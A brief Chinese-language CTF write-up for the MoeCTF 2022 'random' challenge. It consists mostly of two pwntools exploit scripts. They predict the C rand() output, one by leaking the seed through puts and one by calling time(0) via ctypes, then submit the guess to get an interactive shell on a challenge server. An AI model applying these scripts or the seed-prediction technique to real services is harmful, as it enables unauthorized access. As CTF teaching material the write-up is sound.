[MoeCTF 2022]random xshhc的WriteUp

这里使用 puts 泄露随机数种子然后利用 ctypes 模块模拟运行 srand 和 rand 函数做的。
然而，由于涉及到 time(0) ，那么我们也可以用 ctypes 模块模拟运行 time(0) 获得值，这样就不需要 puts 泄露随机数种子

from struct import pack
from ctypes import *
from LibcSearcher import *

def s(a) : p.send(a)
def sa(a, b) : p.sendafter(a, b)
def sl(a) : p.sendline(a)
def sla(a, b) : p.sendlineafter(a, b)
def r() : p.recv()
def pr() : print(p.recv())
def rl(a) : return p.recvuntil(a)
def inter() : p.interactive()
def debug():
    gdb.attach(p)
    pause()
def get_addr() : return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
def csu(rdi, rsi, rdx, rip, gadget) : return p64(gadget) + p64(0) + p64(1) + p64(rip) + p64(rdi) + p64(rsi) + p64(rdx) + p64(gadget - 0x1a)

context(os='linux', arch='amd64', log_level='debug')
#p = process('./pwn')
p = remote('1.14.71.254', 28309)
elf = ELF('./pwn')
#libc = ELF('/home/w1nd/Desktop/glibc-all-in-one/libs/2.27-3ubuntu1.5_amd64/libc-2.27.so')

libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')

sa(b'username: ', b'a'*0x20)
sa(b'password: ', b'ls_4nyth1n9_7ruIy_R4nd0m?\x00')
rl(b'a'*0x20)
seed = u64(p.recvline()[:-1].ljust(8, b'\x00'))
libc.srand(seed)
v3 = libc.rand()
v4 = libc.rand() ^ v3
v5 = libc.rand()
libc.srand(v4 ^ v5)
for i in range(3):
	libc.rand()
sla(b'now.\n', str(libc.rand()))
inter()

print(hex(seed))
#debug()

不需要 puts 泄露的方法

from struct import pack
from ctypes import *
from LibcSearcher import *

def s(a) : p.send(a)
def sa(a, b) : p.sendafter(a, b)
def sl(a) : p.sendline(a)
def sla(a, b) : p.sendlineafter(a, b)
def r() : p.recv()
def pr() : print(p.recv())
def rl(a) : return p.recvuntil(a)
def inter() : p.interactive()
def debug():
    gdb.attach(p)
    pause()
def get_addr() : return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
def csu(rdi, rsi, rdx, rip, gadget) : return p64(gadget) + p64(0) + p64(1) + p64(rip) + p64(rdi) + p64(rsi) + p64(rdx) + p64(gadget - 0x1a)

context(os='linux', arch='amd64', log_level='debug')
p = process('./pwn')
#p = remote('1.14.71.254', 28309)
elf = ELF('./pwn')
#libc = ELF('/home/w1nd/Desktop/glibc-all-in-one/libs/2.27-3ubuntu1.5_amd64/libc-2.27.so')

libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
libc.srand(libc.time(0))
sa(b'username: ', b'a'*0x20)
sa(b'password: ', b'ls_4nyth1n9_7ruIy_R4nd0m?\x00')
rl(b'a'*0x20)
seed = u64(p.recvline()[:-1].ljust(8, b'\x00'))
#libc.srand(seed)
v3 = libc.rand()
v4 = libc.rand() ^ v3
v5 = libc.rand()
libc.srand(v4 ^ v5)
for i in range(3):
	libc.rand()
sla(b'now.\n', str(libc.rand()))
inter()

print(hex(seed))
#debug()